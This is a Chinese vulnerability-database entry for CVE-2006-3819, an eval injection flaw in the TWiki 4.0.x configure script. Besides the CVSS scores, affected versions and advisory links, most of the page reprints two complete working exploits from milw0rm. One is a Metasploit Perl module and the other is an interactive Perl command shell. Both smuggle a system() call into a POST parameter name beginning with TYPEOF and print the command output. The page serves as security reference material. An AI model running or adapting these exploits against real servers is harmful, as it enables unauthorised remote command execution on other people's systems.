CVE-2006-3819
CVSS7.5
发布时间 :2006-07-26 21:04:00
修订时间 :2011-03-07 21:39:32
NMCOES    

[原文]Eval injection vulnerability in the configure script in TWiki 4.0.0 through 4.0.4 allows remote attackers to execute arbitrary Perl code via an HTTP POST request containing a parameter name starting with "TYPEOF".


[CNNVD]TWiki Configure Script TYPEOF参数Eval注入漏洞(CNNVD-200607-447)

        TWiki 4.0.0到4.0.4中的配置脚本存在Eval注入漏洞。远程攻击者可以借助包含以"TYPEOF"开始的参数名称的HTTP POST请求,执行任意Perl代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:twiki:twiki:4.0.2
cpe:/a:twiki:twiki:4.0.3
cpe:/a:twiki:twiki:4.0.4
cpe:/a:twiki:twiki:4.0
cpe:/a:twiki:twiki:4.0.1
cpe:/a:twiki:twiki:4.0.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3819
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3819
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-447
(官方数据源) CNNVD

- 其它链接及资源

http://twiki.org/cgi-bin/view/Codev/SecurityAlertCmdExecWithConfigure
(PATCH)  CONFIRM  http://twiki.org/cgi-bin/view/Codev/SecurityAlertCmdExecWithConfigure
http://www.vupen.com/english/advisories/2006/2995
(UNKNOWN)  VUPEN  ADV-2006-2995
http://xforce.iss.net/xforce/xfdb/28049
(UNKNOWN)  XF  twiki-configure-command-injection(28049)
http://www.securityfocus.com/bid/19188
(UNKNOWN)  BID  19188
http://www.osvdb.org/displayvuln.php?osvdb_id=27556
(UNKNOWN)  OSVDB  27556
http://securitytracker.com/id?1016603
(UNKNOWN)  SECTRACK  1016603
http://secunia.com/advisories/21235
(UNKNOWN)  SECUNIA  21235

- 漏洞信息

TWiki Configure Script TYPEOF参数Eval注入漏洞
高危 输入验证
2006-07-26 00:00:00 2006-07-27 00:00:00
远程  
        TWiki 4.0.0到4.0.4中的配置脚本存在Eval注入漏洞。远程攻击者可以借助包含以"TYPEOF"开始的参数名称的HTTP POST请求,执行任意Perl代码。

- 公告与补丁

        

- 漏洞信息 (2110)

TWiki <= 4.0.4 (Configure Script) Remote Code Execution Exploit (meta) (EDBID:2110)
php webapps
2006-08-02 Verified
0 David Maciejak
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::twiki_config_typeof;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { 
	'HttpBoundary' => ['Mtb06z', 'HTTP boundary']
};

my $info = {
	'Name'     => 'Twiki Configure script TYPEOF Parameter Remote Command Execution',
	'Version'  => '$Revision: 1.0 $',
	'Authors'  => [ 'David Maciejak <david dot maciejak at gmail dot com>' ],
	'Arch'     => [ ],
	'OS'       => [ ],
	'Priv'     => 1,
	'UserOpts' =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 80],
		'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
		'DIR'   => [1, 'DATA', 'Directory of Twiki', '/twiki'],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	  },

	'Description' => Pex::Text::Freeform(qq{
		This module exploits an arbitrary command execution vulnerability in the
	Twiki configure script. All versions of Twiki prior to 
	4.0.4 hotfix 2 are vulnerable. Patch HotFix04x00x04x02 is available on twiki.org homepage.
}),
	'Refs' =>
	  [
		['BID', '19188'],
		['CVE', '2006-3819'],
		['OSVDB', '27556'],
	  ],

	'Payload' =>
	  {
		'Space' => 128,
		'Keys'  => ['cmd','cmd_bash'],
	  },

	'Keys' => ['twiki'],

	'DisclosureDate' => 'Jul 27 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_host    = $self->VHost;
	my $target_port    = $self->GetVar('RPORT');
	my $dir            = $self->GetVar('DIR');
	my $encodedPayload = $self->GetVar('EncodedPayload');
	my $cmd            = $encodedPayload->RawPayload;
	my $boundary		 = $self->GetLocal('HttpBoundary');		

	$cmd=
		"\r\n--".$boundary."\r\n".
		"Content-Disposition: form-data; name=\"action\"\r\n\r\n".
		"update\r\n".
		"--".$boundary.
		"Content-Disposition: form-data; name=\"TYPEOF:{system('$cmd')}\"\r\n\r\n".
		"BOOLEAN\r\n".
		"--".$boundary;

	my $proto="http";
	if ($self->GetVar('SSL'))
	{
		$proto.="s";
	}

	 my $request =
    	"POST ".$dir."/bin/configure HTTP/1.1\r\n".
		"Content-Type: multipart/form-data; boundary=".$boundary."\r\n".
		"User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.31-grsec i686)\r\n".
		"Host: $target_host\r\n".
		"Referer: ".$proto."://".$target_host.$dir."/bin/configure\r\n".
		"Accept: image/gif, image/x-xbitmap, image/jpeg, image/png\r\n".
		"Accept-Language: en\r\n".
		"Content-Length: ". length($cmd). "\r\n\r\n".
		$cmd;

	my $s = Msf::Socket::Tcp->new(
		'PeerAddr' => $target_host,
		'PeerPort' => $target_port,
		'SSL'      => $self->GetVar('SSL'),
	  );

	if ($s->IsError){
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$s->Send($request);

	my $results = $s->Recv(-1, 200);

	if ($results=~ /^transfer-encoding:[ \t]*chunked\b/im){
		my @extract_result;
		my @results = split ( /\r\n/, $results );

		chomp @results;
		my $fill_extract_result=0;
		my $end_break=0;
		my $i=0;
		while ( !$end_break && ($i < @results)){
			if ($results[$i] =~ /\<div id=\"patternScreen\"\>/)
			{
				$fill_extract_result=0;
				$end_break=1;
			}
			if ($fill_extract_result>0) {
					push(@extract_result,$results[$i]);
			}
			if ($results[$i] =~ /\<body class=\"patternNoViewPage\"\>/)
			{
				$fill_extract_result=1;
			}
			$i++;
		}

		if (@extract_result < 3) {
				$self->PrintLine("[*] Target may be not vulnerable, or you have used ';' char in CMD");	
		}
		else {
			for ($i=1;$i<@extract_result;$i+=2) {
				chomp @extract_result;
				$self->PrintLine("$extract_result[$i]");
			}
		}
	}

	$s->Close();
	return;
}

sub VHost {
	my $self = shift;
	my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST');
	return $name;
}

1;

# milw0rm.com [2006-08-02]
		

- 漏洞信息 (2143)

TWiki <= 4.0.4 (configure) Remote Command Execution Exploit (EDBID:2143)
php webapps
2006-08-07 Verified
0 Javier Olascoaga
N/A [点击下载]
#!/usr/bin/perl 
# Tue Aug  1 13:18:12 CEST 2006 jolascoaga@514.es
use strict;
use LWP::UserAgent;
use LWP::Simple;
use HTTP::Request;
use HTTP::Response;
use Getopt::Long;
$| = 1;   # couse 1 is bigger than 0
my ($proxy,$proxy_user,$proxy_pass);
my ($host,$debug,$dir, $command);
my $options = GetOptions (
  'host=s'	      => \$host, 
  'dir=s'	      => \$dir,
  'proxy=s'           => \$proxy,
  'proxy_user=s'      => \$proxy_user,
  'proxy_pass=s'      => \$proxy_pass,
  'debug'             => \$debug);
&help unless ($host); # you dont need root
$dir = "/twiki/bin/configure" unless($dir); # ... we have a template for this
print "$host - $dir\n";
while () {
		print "tinkiwinki> "; # phf haquerz style
		while(<STDIN>) {
				$command=$_;
				chomp($command);
				last;
		}
		&send($command);
}

sub send {
    my ($cmd) = @_;
    my $ok	=	0;
    my $socket;
    LWP::Debug::level('+') if $debug; # but remember this is crap :D
    my $ua = new LWP::UserAgent();   
    $ua->agent("safari/zoo"); 
    if ($host !~ /^http/) {
	$host = sprintf ("http://%s", $host); # CRAP CRAP CRAP
    }
    my $req = HTTP::Request->new(POST => $host.$dir);
    $req->content('action=update&TYPEOF%3A%29%3Bsystem%28%27'.$cmd.'%27%29%3Bmy+@a%3D%28=anything&submit=Submit');
    $ua->proxy(['http'] => $proxy) if $proxy;
    $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
    print $req->as_string() if $debug; 
    my $res = $ua->request($req);
    my $html = $res->content(); 
    $html =~ m/<body.*?>(.*?)<div/si; # <pus>
    print $1."\n";
    if ($debug) {
		open (DEBG, ">wikidebug");
		print DEBG $html;
    }
}
sub help {
    print "Syntax: ./$0 --host=url --dir=/horde [options]\n";
    print "\t--proxy (http), --proxy_user, --proxy_pass\n";
    print "\t--debug\n";
    print "the default directory is /twiki/bin/configure\n";
    print "\nExample\n";
    print "bash# $0 --host=http(s)://www.server.com/\n";
    print "\n";
    exit(1);
}
exit 0;
# <END OF EXPLOIT>

# milw0rm.com [2006-08-07]
		

- 漏洞信息

27556
TWiki twiki/bin/configure TYPEOF Parameter Arbitrary Command Execution
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-07-26 Unknow
2006-07-26 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

TWiki Configure Script TYPEOF Parameter Remote Command Execution Vulnerability
Input Validation Error 19188
Yes No
2006-07-27 12:00:00 2006-08-08 11:06:00
This vulnerability was discovered by Ben Wheeler.

- 受影响的程序版本

TWiki TWiki 4.0.4
TWiki TWiki 4.0.3
TWiki TWiki 4.0.2
TWiki TWiki 4.0.1
TWiki TWiki 0

- 漏洞讨论

TWiki is prone to a remote command-execution vulnerability.

Attackers can exploit this issue to execute arbitrary system commands with the privileges of the webserver process.

- 漏洞利用

Attackers can exploit this issue via a web client.

The following exploit programs are available:

- 解决方案

The vendor has released an advisory to address this issue. Please see the referenced advisory for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站